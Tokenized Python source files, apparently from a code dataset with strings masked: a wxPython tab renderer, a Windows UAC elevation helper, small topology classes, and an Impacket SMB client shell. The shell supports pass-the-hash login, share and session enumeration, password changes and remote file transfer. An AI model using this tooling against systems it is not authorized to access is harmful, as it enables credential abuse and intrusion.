def SetSizingInfo ( self , tab_ctrl_size , tab_count , minMaxTabWidth ) : <EOL> """<STR_LIT>""" <EOL> AuiDefaultTabArt . SetSizingInfo ( self , tab_ctrl_size , tab_count , minMaxTabWidth ) <EOL> minTabWidth , maxTabWidth = minMaxTabWidth <EOL> if minTabWidth > - <NUM_LIT:1> : <EOL> self . _fixed_tab_width = max ( self . 
_fixed_tab_width , minTabWidth ) <EOL> if maxTabWidth > - <NUM_LIT:1> : <EOL> self . _fixed_tab_width = min ( self . _fixed_tab_width , maxTabWidth ) <EOL> self . _fixed_tab_width -= <NUM_LIT:5> <EOL> def GetTabSize ( self , dc , wnd , caption , bitmap , active , close_button_state , control = None ) : <EOL> """<STR_LIT>""" <EOL> tab_size , x_extent = AuiDefaultTabArt . GetTabSize ( self , dc , wnd , caption , bitmap , <EOL> active , close_button_state , control ) <EOL> tab_width , tab_height = tab_size <EOL> tab_width += self . _leftActiveBmp . GetWidth ( ) <EOL> tab_height += <NUM_LIT:2> <EOL> tab_height = max ( tab_height , self . _centerActiveBmp . GetHeight ( ) ) <EOL> return ( tab_width , tab_height ) , x_extent <EOL> def DrawTab ( self , dc , wnd , page , in_rect , close_button_state , paint_control = False ) : <EOL> """<STR_LIT>""" <EOL> control = page . control <EOL> tab_size , x_extent = self . GetTabSize ( dc , wnd , page . caption , page . bitmap , page . active , <EOL> close_button_state , control ) <EOL> agwFlags = self . GetAGWFlags ( ) <EOL> tab_height = self . _tab_ctrl_height - <NUM_LIT:1> <EOL> tab_width = tab_size [ <NUM_LIT:0> ] <EOL> tab_x = in_rect . x <EOL> tab_y = in_rect . y + in_rect . height - tab_height <EOL> clip_width = tab_width <EOL> if tab_x + clip_width > in_rect . x + in_rect . width - <NUM_LIT:4> : <EOL> clip_width = ( in_rect . x + in_rect . width ) - tab_x - <NUM_LIT:4> <EOL> dc . SetClippingRegion ( tab_x , tab_y , clip_width + <NUM_LIT:1> , tab_height - <NUM_LIT:3> ) <EOL> drawn_tab_yoff = <NUM_LIT:1> <EOL> if page . active : <EOL> left = self . _leftActiveBmp <EOL> center = self . _centerActiveBmp <EOL> right = self . _rightActiveBmp <EOL> else : <EOL> left = self . _leftInactiveBmp <EOL> center = self . _centerInactiveBmp <EOL> right = self . _rightInactiveBmp <EOL> dc . DrawBitmap ( left , tab_x , tab_y ) <EOL> leftw = left . GetWidth ( ) <EOL> centerw = center . GetWidth ( ) <EOL> rightw = right . 
GetWidth ( ) <EOL> available = tab_x + tab_width - rightw <EOL> posx = tab_x + leftw <EOL> while <NUM_LIT:1> : <EOL> if posx >= available : <EOL> break <EOL> dc . DrawBitmap ( center , posx , tab_y ) <EOL> posx += centerw <EOL> dc . DrawBitmap ( right , posx , tab_y ) <EOL> drawn_tab_height = center . GetHeight ( ) <EOL> text_offset = tab_x + leftw <EOL> close_button_width = <NUM_LIT:0> <EOL> if close_button_state != AUI_BUTTON_STATE_HIDDEN : <EOL> close_button_width = self . _active_close_bmp . GetWidth ( ) <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT : <EOL> text_offset += close_button_width <EOL> if not page . enabled : <EOL> dc . SetTextForeground ( wx . SystemSettings . GetColour ( wx . SYS_COLOUR_GRAYTEXT ) ) <EOL> pagebitmap = page . dis_bitmap <EOL> else : <EOL> dc . SetTextForeground ( page . text_colour ) <EOL> pagebitmap = page . bitmap <EOL> bitmap_offset = <NUM_LIT:0> <EOL> if pagebitmap . IsOk ( ) : <EOL> bitmap_offset = tab_x + leftw <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT and close_button_width : <EOL> bitmap_offset += close_button_width <EOL> dc . DrawBitmap ( pagebitmap , bitmap_offset , <EOL> drawn_tab_yoff + ( drawn_tab_height / <NUM_LIT:2> ) - ( pagebitmap . GetHeight ( ) / <NUM_LIT:2> ) , <EOL> True ) <EOL> text_offset = bitmap_offset + pagebitmap . GetWidth ( ) <EOL> text_offset += <NUM_LIT:3> <EOL> else : <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT == <NUM_LIT:0> or not close_button_width : <EOL> text_offset = tab_x + leftw <EOL> caption = page . caption <EOL> if caption == "<STR_LIT>" : <EOL> caption = "<STR_LIT>" <EOL> if page . active : <EOL> dc . SetFont ( self . _selected_font ) <EOL> textx , texty , dummy = dc . GetMultiLineTextExtent ( caption ) <EOL> else : <EOL> dc . SetFont ( self . _normal_font ) <EOL> textx , texty , dummy = dc . 
GetMultiLineTextExtent ( caption ) <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT : <EOL> draw_text = ChopText ( dc , caption , tab_width - ( text_offset - tab_x ) - leftw ) <EOL> else : <EOL> draw_text = ChopText ( dc , caption , tab_width - ( text_offset - tab_x ) - close_button_width - leftw ) <EOL> ypos = drawn_tab_yoff + drawn_tab_height / <NUM_LIT:2> - texty / <NUM_LIT:2> - <NUM_LIT:1> <EOL> if control is not None : <EOL> if control . GetPosition ( ) != wx . Point ( text_offset + <NUM_LIT:1> , ypos ) : <EOL> control . SetPosition ( wx . Point ( text_offset + <NUM_LIT:1> , ypos ) ) <EOL> if not control . IsShown ( ) : <EOL> control . Show ( ) <EOL> if paint_control : <EOL> bmp = TakeScreenShot ( control . GetScreenRect ( ) ) <EOL> dc . DrawBitmap ( bmp , text_offset + <NUM_LIT:1> , ypos , True ) <EOL> controlW , controlH = control . GetSize ( ) <EOL> text_offset += controlW + <NUM_LIT:4> <EOL> rectx , recty , dummy = dc . GetMultiLineTextExtent ( draw_text ) <EOL> dc . DrawLabel ( draw_text , wx . Rect ( text_offset , ypos , rectx , recty ) ) <EOL> out_button_rect = wx . Rect ( ) <EOL> if close_button_state != AUI_BUTTON_STATE_HIDDEN : <EOL> close_button_width = self . _active_close_bmp . GetWidth ( ) <EOL> bmp = self . _disabled_close_bmp <EOL> if close_button_state == AUI_BUTTON_STATE_HOVER : <EOL> bmp = self . _hover_close_bmp <EOL> elif close_button_state == AUI_BUTTON_STATE_PRESSED : <EOL> bmp = self . _pressed_close_bmp <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT : <EOL> rect = wx . Rect ( tab_x + leftw - <NUM_LIT:2> , <EOL> drawn_tab_yoff + ( drawn_tab_height / <NUM_LIT:2> ) - ( bmp . GetHeight ( ) / <NUM_LIT:2> ) + <NUM_LIT:1> , <EOL> close_button_width , tab_height ) <EOL> else : <EOL> rect = wx . Rect ( tab_x + tab_width - close_button_width - rightw + <NUM_LIT:2> , <EOL> drawn_tab_yoff + ( drawn_tab_height / <NUM_LIT:2> ) - ( bmp . 
GetHeight ( ) / <NUM_LIT:2> ) + <NUM_LIT:1> , <EOL> close_button_width , tab_height ) <EOL> if agwFlags & AUI_NB_BOTTOM : <EOL> rect . y -= <NUM_LIT:1> <EOL> rect = IndentPressedBitmap ( rect , close_button_state ) <EOL> dc . DrawBitmap ( bmp , rect . x , rect . y , True ) <EOL> out_button_rect = rect <EOL> out_tab_rect = wx . Rect ( tab_x , tab_y , tab_width , tab_height ) <EOL> dc . DestroyClippingRegion ( ) <EOL> return out_tab_rect , out_button_rect , x_extent </s>
<s> from __future__ import print_function <EOL> import sys , os , traceback , types <EOL> if sys . version_info < ( <NUM_LIT:3> , ) : <EOL> text_type = basestring <EOL> else : <EOL> text_type = str <EOL> def isUserAdmin ( ) : <EOL> if os . name == '<STR_LIT>' : <EOL> import ctypes <EOL> try : <EOL> return ctypes . windll . shell32 . IsUserAnAdmin ( ) <EOL> except : <EOL> traceback . print_exc ( ) <EOL> print ( "<STR_LIT>" ) <EOL> return False <EOL> elif os . name == '<STR_LIT>' : <EOL> return os . getuid ( ) == <NUM_LIT:0> <EOL> else : <EOL> raise RuntimeError ( "<STR_LIT>" % ( os . name , ) ) <EOL> def runAsAdmin ( cmdLine = None , wait = True ) : <EOL> if os . name != '<STR_LIT>' : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> import win32api , win32con , win32event , win32process <EOL> from win32com . shell . shell import ShellExecuteEx <EOL> from win32com . shell import shellcon <EOL> python_exe = sys . executable <EOL> if cmdLine is None : <EOL> cmdLine = [ python_exe ] + sys . argv <EOL> elif not hasattr ( cmdLine , "<STR_LIT>" ) or isinstance ( cmdLine , text_type ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> cmd = '<STR_LIT>' % ( cmdLine [ <NUM_LIT:0> ] , ) <EOL> params = "<STR_LIT:U+0020>" . join ( [ '<STR_LIT>' % ( x , ) for x in cmdLine [ <NUM_LIT:1> : ] ] ) <EOL> cmdDir = '<STR_LIT>' <EOL> showCmd = win32con . SW_SHOWNORMAL <EOL> lpVerb = '<STR_LIT>' <EOL> procInfo = ShellExecuteEx ( nShow = showCmd , <EOL> fMask = shellcon . SEE_MASK_NOCLOSEPROCESS , <EOL> lpVerb = lpVerb , <EOL> lpFile = cmd , <EOL> lpParameters = params ) <EOL> if wait : <EOL> procHandle = procInfo [ '<STR_LIT>' ] <EOL> obj = win32event . WaitForSingleObject ( procHandle , win32event . INFINITE ) <EOL> rc = win32process . GetExitCodeProcess ( procHandle ) <EOL> else : <EOL> rc = None <EOL> return rc </s>
<s> from hydro . topology_base import Topology <EOL> from hydro . exceptions import HydroException <EOL> from copy import deepcopy <EOL> __author__ = '<STR_LIT>' <EOL> class ResultSet ( object ) : <EOL> def __init__ ( self , plan , stream ) : <EOL> self . stream = stream <EOL> self . plan = plan <EOL> class HydroBase ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . _topologies = dict ( ) <EOL> def return_topology_callback_if_exist ( self , topology ) : <EOL> if topology in self . _topologies : <EOL> return self . _topologies [ topology ] . submit <EOL> return None <EOL> def register ( self , name , obj ) : <EOL> if not isinstance ( obj , Topology ) : <EOL> raise HydroException ( "<STR_LIT>" ) <EOL> self . _topologies [ name ] = obj <EOL> def submit ( self , name , params = None ) : <EOL> topology = self . _topologies . get ( name , None ) <EOL> if not topology : <EOL> raise HydroException ( "<STR_LIT>" ) <EOL> topology . query_engine . set_topology_lookup_callback ( self . return_topology_callback_if_exist ) <EOL> topology . query_engine . set_topology_cache_ttl_callback ( topology . topology_cache_ttl_callback ) <EOL> data = topology . submit ( deepcopy ( params ) ) <EOL> execution_plan = topology . get_execution_plan ( ) <EOL> return ResultSet ( execution_plan , data ) <EOL> class LocalHydro ( HydroBase ) : <EOL> """<STR_LIT>""" <EOL> pass </s>
<s> __author__ = '<STR_LIT>' <EOL> from hydro import Configurator <EOL> from hydro . base_classes import HydroStr , HydroDatetime , HydroList <EOL> conf = Configurator . config_builder ( ) <EOL> conf . OPTIMIZER = '<STR_LIT>' <EOL> conf . PLAN_ALLOWED_PARAMETERS = { '<STR_LIT>' : { '<STR_LIT:type>' : HydroStr } , <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : HydroDatetime } , <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : HydroDatetime } , <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : HydroList } <EOL> } </s>
<s> import sys <EOL> import time <EOL> import logging <EOL> import argparse <EOL> import cmd <EOL> import os <EOL> from impacket . examples import logger <EOL> from impacket import version <EOL> from impacket . dcerpc . v5 import samr , transport , srvs <EOL> from impacket . dcerpc . v5 . dtypes import NULL <EOL> from impacket . smbconnection import * <EOL> try : <EOL> import pyreadline as readline <EOL> except ImportError : <EOL> import readline <EOL> class MiniImpacketShell ( cmd . Cmd ) : <EOL> def __init__ ( self , smbClient ) : <EOL> cmd . Cmd . __init__ ( self ) <EOL> self . prompt = '<STR_LIT>' <EOL> self . smb = smbClient <EOL> self . username , self . password , self . domain , self . lmhash , self . nthash , self . aesKey , self . TGT , self . TGS = smbClient . getCredentials ( ) <EOL> self . tid = None <EOL> self . intro = '<STR_LIT>' <EOL> self . pwd = '<STR_LIT>' <EOL> self . share = None <EOL> self . loggedIn = True <EOL> self . last_output = None <EOL> self . completion = [ ] <EOL> def emptyline ( self ) : <EOL> pass <EOL> def precmd ( self , line ) : <EOL> return line . decode ( '<STR_LIT:utf-8>' ) <EOL> def onecmd ( self , s ) : <EOL> retVal = False <EOL> try : <EOL> retVal = cmd . Cmd . onecmd ( self , s ) <EOL> except Exception , e : <EOL> logging . error ( e ) <EOL> return retVal <EOL> def do_exit ( self , line ) : <EOL> return True <EOL> def do_shell ( self , line ) : <EOL> output = os . popen ( line ) . read ( ) <EOL> print output <EOL> self . last_output = output <EOL> def do_help ( self , line ) : <EOL> print """<STR_LIT>""" <EOL> def do_password ( self , line ) : <EOL> if self . loggedIn is False : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> from getpass import getpass <EOL> newPassword = getpass ( "<STR_LIT>" ) <EOL> rpctransport = transport . SMBTransport ( self . smb . getRemoteHost ( ) , filename = r'<STR_LIT>' , smb_connection = self . smb ) <EOL> dce = rpctransport . get_dce_rpc ( ) <EOL> dce . connect ( ) <EOL> dce . 
bind ( samr . MSRPC_UUID_SAMR ) <EOL> samr . hSamrUnicodeChangePasswordUser2 ( dce , '<STR_LIT:\x00>' , self . username , self . password , newPassword , self . lmhash , self . nthash ) <EOL> self . password = newPassword <EOL> self . lmhash = None <EOL> self . nthash = None <EOL> def do_open ( self , line ) : <EOL> l = line . split ( '<STR_LIT:U+0020>' ) <EOL> port = <NUM_LIT> <EOL> if len ( l ) > <NUM_LIT:0> : <EOL> host = l [ <NUM_LIT:0> ] <EOL> if len ( l ) > <NUM_LIT:1> : <EOL> port = int ( l [ <NUM_LIT:1> ] ) <EOL> if port == <NUM_LIT> : <EOL> self . smb = SMBConnection ( '<STR_LIT>' , host , sess_port = port ) <EOL> else : <EOL> self . smb = SMBConnection ( host , host , sess_port = port ) <EOL> dialect = self . smb . getDialect ( ) <EOL> if dialect == SMB_DIALECT : <EOL> logging . info ( "<STR_LIT>" ) <EOL> elif dialect == SMB2_DIALECT_002 : <EOL> logging . info ( "<STR_LIT>" ) <EOL> elif dialect == SMB2_DIALECT_21 : <EOL> logging . info ( "<STR_LIT>" ) <EOL> else : <EOL> logging . info ( "<STR_LIT>" ) <EOL> self . share = None <EOL> self . tid = None <EOL> self . pwd = '<STR_LIT>' <EOL> self . loggedIn = False <EOL> self . password = None <EOL> self . lmhash = None <EOL> self . nthash = None <EOL> self . username = None <EOL> def do_login ( self , line ) : <EOL> if self . smb is None : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> l = line . split ( '<STR_LIT:U+0020>' ) <EOL> username = '<STR_LIT>' <EOL> password = '<STR_LIT>' <EOL> domain = '<STR_LIT>' <EOL> if len ( l ) > <NUM_LIT:0> : <EOL> username = l [ <NUM_LIT:0> ] <EOL> if len ( l ) > <NUM_LIT:1> : <EOL> password = l [ <NUM_LIT:1> ] <EOL> if username . find ( '<STR_LIT:/>' ) > <NUM_LIT:0> : <EOL> domain , username = username . split ( '<STR_LIT:/>' ) <EOL> if password == '<STR_LIT>' and username != '<STR_LIT>' : <EOL> from getpass import getpass <EOL> password = getpass ( "<STR_LIT>" ) <EOL> self . smb . login ( username , password , domain = domain ) <EOL> self . 
password = password <EOL> self . username = username <EOL> if self . smb . isGuestSession ( ) > <NUM_LIT:0> : <EOL> logging . info ( "<STR_LIT>" ) <EOL> else : <EOL> logging . info ( "<STR_LIT>" ) <EOL> self . loggedIn = True <EOL> def do_kerberos_login ( self , line ) : <EOL> if self . smb is None : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> l = line . split ( '<STR_LIT:U+0020>' ) <EOL> username = '<STR_LIT>' <EOL> password = '<STR_LIT>' <EOL> domain = '<STR_LIT>' <EOL> if len ( l ) > <NUM_LIT:0> : <EOL> username = l [ <NUM_LIT:0> ] <EOL> if len ( l ) > <NUM_LIT:1> : <EOL> password = l [ <NUM_LIT:1> ] <EOL> if username . find ( '<STR_LIT:/>' ) > <NUM_LIT:0> : <EOL> domain , username = username . split ( '<STR_LIT:/>' ) <EOL> if domain == '<STR_LIT>' : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> if password == '<STR_LIT>' and username != '<STR_LIT>' : <EOL> from getpass import getpass <EOL> password = getpass ( "<STR_LIT>" ) <EOL> self . smb . kerberosLogin ( username , password , domain = domain ) <EOL> self . password = password <EOL> self . username = username <EOL> if self . smb . isGuestSession ( ) > <NUM_LIT:0> : <EOL> logging . info ( "<STR_LIT>" ) <EOL> else : <EOL> logging . info ( "<STR_LIT>" ) <EOL> self . loggedIn = True <EOL> def do_login_hash ( self , line ) : <EOL> if self . smb is None : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> l = line . split ( '<STR_LIT:U+0020>' ) <EOL> domain = '<STR_LIT>' <EOL> if len ( l ) > <NUM_LIT:0> : <EOL> username = l [ <NUM_LIT:0> ] <EOL> if len ( l ) > <NUM_LIT:1> : <EOL> hashes = l [ <NUM_LIT:1> ] <EOL> else : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> if username . find ( '<STR_LIT:/>' ) > <NUM_LIT:0> : <EOL> domain , username = username . split ( '<STR_LIT:/>' ) <EOL> lmhash , nthash = hashes . split ( '<STR_LIT::>' ) <EOL> self . smb . login ( username , '<STR_LIT>' , domain , lmhash = lmhash , nthash = nthash ) <EOL> self . username = username <EOL> self . 
lmhash = lmhash <EOL> self . nthash = nthash <EOL> if self . smb . isGuestSession ( ) > <NUM_LIT:0> : <EOL> logging . info ( "<STR_LIT>" ) <EOL> else : <EOL> logging . info ( "<STR_LIT>" ) <EOL> self . loggedIn = True <EOL> def do_logoff ( self , line ) : <EOL> if self . smb is None : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> self . smb . logoff ( ) <EOL> del self . smb <EOL> self . share = None <EOL> self . smb = None <EOL> self . tid = None <EOL> self . pwd = '<STR_LIT>' <EOL> self . loggedIn = False <EOL> self . password = None <EOL> self . lmhash = None <EOL> self . nthash = None <EOL> self . username = None <EOL> def do_info ( self , line ) : <EOL> if self . loggedIn is False : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> rpctransport = transport . SMBTransport ( self . smb . getRemoteHost ( ) , filename = r'<STR_LIT>' , smb_connection = self . smb ) <EOL> dce = rpctransport . get_dce_rpc ( ) <EOL> dce . connect ( ) <EOL> dce . bind ( srvs . MSRPC_UUID_SRVS ) <EOL> resp = srvs . hNetrServerGetInfo ( dce , <NUM_LIT> ) <EOL> print "<STR_LIT>" % resp [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % resp [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % resp [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % resp [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % resp [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % resp [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> def do_who ( self , line ) : <EOL> if self . loggedIn is False : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> rpctransport = transport . SMBTransport ( self . smb . getRemoteHost ( ) , filename = r'<STR_LIT>' , smb_connection = self . smb ) <EOL> dce = rpctransport . get_dce_rpc ( ) <EOL> dce . connect ( ) <EOL> dce . bind ( srvs . MSRPC_UUID_SRVS ) <EOL> resp = srvs . 
hNetrSessionEnum ( dce , NULL , NULL , <NUM_LIT:10> ) <EOL> for session in resp [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> print "<STR_LIT>" % ( session [ '<STR_LIT>' ] [ : - <NUM_LIT:1> ] , session [ '<STR_LIT>' ] [ : - <NUM_LIT:1> ] , session [ '<STR_LIT>' ] , session [ '<STR_LIT>' ] ) <EOL> def do_shares ( self , line ) : <EOL> if self . loggedIn is False : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> resp = self . smb . listShares ( ) <EOL> for i in range ( len ( resp ) ) : <EOL> print resp [ i ] [ '<STR_LIT>' ] [ : - <NUM_LIT:1> ] <EOL> def do_use ( self , line ) : <EOL> if self . loggedIn is False : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> self . share = line <EOL> self . tid = self . smb . connectTree ( line ) <EOL> self . pwd = '<STR_LIT:\\>' <EOL> self . do_ls ( '<STR_LIT>' , False ) <EOL> def complete_cd ( self , text , line , begidx , endidx ) : <EOL> return self . complete_get ( text , line , begidx , endidx , include = <NUM_LIT:2> ) <EOL> def do_cd ( self , line ) : <EOL> if self . tid is None : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> p = string . replace ( line , '<STR_LIT:/>' , '<STR_LIT:\\>' ) <EOL> oldpwd = self . pwd <EOL> if p [ <NUM_LIT:0> ] == '<STR_LIT:\\>' : <EOL> self . pwd = line <EOL> else : <EOL> self . pwd = ntpath . join ( self . pwd , line ) <EOL> self . pwd = ntpath . normpath ( self . pwd ) <EOL> try : <EOL> fid = self . smb . openFile ( self . tid , self . pwd , creationOption = FILE_DIRECTORY_FILE , desiredAccess = FILE_READ_DATA | FILE_LIST_DIRECTORY , shareMode = FILE_SHARE_READ | FILE_SHARE_WRITE ) <EOL> self . smb . closeFile ( self . tid , fid ) <EOL> except SessionError : <EOL> self . pwd = oldpwd <EOL> raise <EOL> def do_lcd ( self , s ) : <EOL> print s <EOL> if s == '<STR_LIT>' : <EOL> print os . getcwd ( ) <EOL> else : <EOL> os . chdir ( s ) <EOL> def do_pwd ( self , line ) : <EOL> if self . loggedIn is False : <EOL> logging . 
error ( "<STR_LIT>" ) <EOL> return <EOL> print self . pwd <EOL> def do_ls ( self , wildcard , display = True ) : <EOL> if self . loggedIn is False : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> if self . tid is None : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> if wildcard == '<STR_LIT>' : <EOL> pwd = ntpath . join ( self . pwd , '<STR_LIT:*>' ) <EOL> else : <EOL> pwd = ntpath . join ( self . pwd , wildcard ) <EOL> self . completion = [ ] <EOL> pwd = string . replace ( pwd , '<STR_LIT:/>' , '<STR_LIT:\\>' ) <EOL> pwd = ntpath . normpath ( pwd ) <EOL> for f in self . smb . listPath ( self . share , pwd ) : <EOL> if display is True : <EOL> print "<STR_LIT>" % ( '<STR_LIT:d>' if f . is_directory ( ) > <NUM_LIT:0> else '<STR_LIT:->' , f . get_filesize ( ) , time . ctime ( float ( f . get_mtime_epoch ( ) ) ) , f . get_longname ( ) ) <EOL> self . completion . append ( ( f . get_longname ( ) , f . is_directory ( ) ) ) <EOL> def do_rm ( self , filename ) : <EOL> if self . tid is None : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> f = ntpath . join ( self . pwd , filename ) <EOL> file = string . replace ( f , '<STR_LIT:/>' , '<STR_LIT:\\>' ) <EOL> self . smb . deleteFile ( self . share , file ) <EOL> def do_mkdir ( self , path ) : <EOL> if self . tid is None : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> p = ntpath . join ( self . pwd , path ) <EOL> pathname = string . replace ( p , '<STR_LIT:/>' , '<STR_LIT:\\>' ) <EOL> self . smb . createDirectory ( self . share , pathname ) <EOL> def do_rmdir ( self , path ) : <EOL> if self . tid is None : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> p = ntpath . join ( self . pwd , path ) <EOL> pathname = string . replace ( p , '<STR_LIT:/>' , '<STR_LIT:\\>' ) <EOL> self . smb . deleteDirectory ( self . share , pathname ) <EOL> def do_put ( self , pathname ) : <EOL> if self . tid is None : <EOL> logging . 
error ( "<STR_LIT>" ) <EOL> return <EOL> src_path = pathname <EOL> dst_name = os . path . basename ( src_path ) <EOL> fh = open ( pathname , '<STR_LIT:rb>' ) <EOL> f = ntpath . join ( self . pwd , dst_name ) <EOL> finalpath = string . replace ( f , '<STR_LIT:/>' , '<STR_LIT:\\>' ) <EOL> self . smb . putFile ( self . share , finalpath , fh . read ) <EOL> fh . close ( ) <EOL> def complete_get ( self , text , line , begidx , endidx , include = <NUM_LIT:1> ) : <EOL> p = string . replace ( line , '<STR_LIT:/>' , '<STR_LIT:\\>' ) <EOL> if p . find ( '<STR_LIT:\\>' ) < <NUM_LIT:0> : <EOL> items = [ ] <EOL> if include == <NUM_LIT:1> : <EOL> mask = <NUM_LIT:0> <EOL> else : <EOL> mask = <NUM_LIT> <EOL> for i in self . completion : <EOL> if i [ <NUM_LIT:1> ] == mask : <EOL> items . append ( i [ <NUM_LIT:0> ] ) <EOL> if text : <EOL> return [ <EOL> item for item in items <EOL> if item . upper ( ) . startswith ( text . upper ( ) ) <EOL> ] <EOL> else : <EOL> return items <EOL> def do_get ( self , filename ) : <EOL> if self . tid is None : <EOL> logging . error ( "<STR_LIT>" ) <EOL> return <EOL> filename = string . replace ( filename , '<STR_LIT:/>' , '<STR_LIT:\\>' ) <EOL> fh = open ( ntpath . basename ( filename ) , '<STR_LIT:wb>' ) <EOL> pathname = ntpath . join ( self . pwd , filename ) <EOL> try : <EOL> self . smb . getFile ( self . share , pathname , fh . write ) <EOL> except : <EOL> fh . close ( ) <EOL> os . remove ( filename ) <EOL> raise <EOL> fh . close ( ) <EOL> def do_close ( self , line ) : <EOL> self . do_logoff ( line ) <EOL> def main ( ) : <EOL> logger . init ( ) <EOL> print version . BANNER <EOL> parser = argparse . ArgumentParser ( add_help = True , description = "<STR_LIT>" ) <EOL> parser . add_argument ( '<STR_LIT:target>' , action = '<STR_LIT:store>' , help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , type = argparse . FileType ( '<STR_LIT:r>' ) , help = '<STR_LIT>' ) <EOL> parser . 
add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , help = '<STR_LIT>' ) <EOL> group = parser . add_argument_group ( '<STR_LIT>' ) <EOL> group . add_argument ( '<STR_LIT>' , action = "<STR_LIT:store>" , metavar = "<STR_LIT>" , help = '<STR_LIT>' ) <EOL> group . add_argument ( '<STR_LIT>' , action = "<STR_LIT:store_true>" , help = '<STR_LIT>' ) <EOL> group . add_argument ( '<STR_LIT>' , action = "<STR_LIT:store_true>" , help = '<STR_LIT>' ) <EOL> group . add_argument ( '<STR_LIT>' , action = "<STR_LIT:store>" , metavar = "<STR_LIT>" , help = '<STR_LIT>' ) <EOL> if len ( sys . argv ) == <NUM_LIT:1> : <EOL> parser . print_help ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> options = parser . parse_args ( ) <EOL> if options . debug is True : <EOL> logging . getLogger ( ) . setLevel ( logging . DEBUG ) <EOL> else : <EOL> logging . getLogger ( ) . setLevel ( logging . INFO ) <EOL> import re <EOL> domain , username , password , address = re . compile ( '<STR_LIT>' ) . match ( options . target ) . groups ( '<STR_LIT>' ) <EOL> if '<STR_LIT:@>' in address : <EOL> password = password + '<STR_LIT:@>' + address . rpartition ( '<STR_LIT:@>' ) [ <NUM_LIT:0> ] <EOL> address = address . rpartition ( '<STR_LIT:@>' ) [ <NUM_LIT:2> ] <EOL> if domain is None : <EOL> domain = '<STR_LIT>' <EOL> if password == '<STR_LIT>' and username != '<STR_LIT>' and options . hashes is None and options . no_pass is False and options . aesKey is None : <EOL> from getpass import getpass <EOL> password = getpass ( "<STR_LIT>" ) <EOL> if options . aesKey is not None : <EOL> options . k = True <EOL> if options . hashes is not None : <EOL> lmhash , nthash = options . hashes . split ( '<STR_LIT::>' ) <EOL> else : <EOL> lmhash = '<STR_LIT>' <EOL> nthash = '<STR_LIT>' <EOL> try : <EOL> smbClient = SMBConnection ( address , address ) <EOL> if options . k is True : <EOL> smbClient . kerberosLogin ( username , password , domain , lmhash , nthash , options . aesKey ) <EOL> else : <EOL> smbClient . 
login ( username , password , domain , lmhash , nthash ) <EOL> shell = MiniImpacketShell ( smbClient ) <EOL> if options . file is not None : <EOL> logging . info ( "<STR_LIT>" % options . file . name ) <EOL> for line in options . file . readlines ( ) : <EOL> if line [ <NUM_LIT:0> ] != '<STR_LIT:#>' : <EOL> print "<STR_LIT>" % line , <EOL> shell . onecmd ( line ) <EOL> else : <EOL> print line , <EOL> else : <EOL> shell . cmdloop ( ) <EOL> except Exception , e : <EOL> logging . error ( str ( e ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> pass </s>
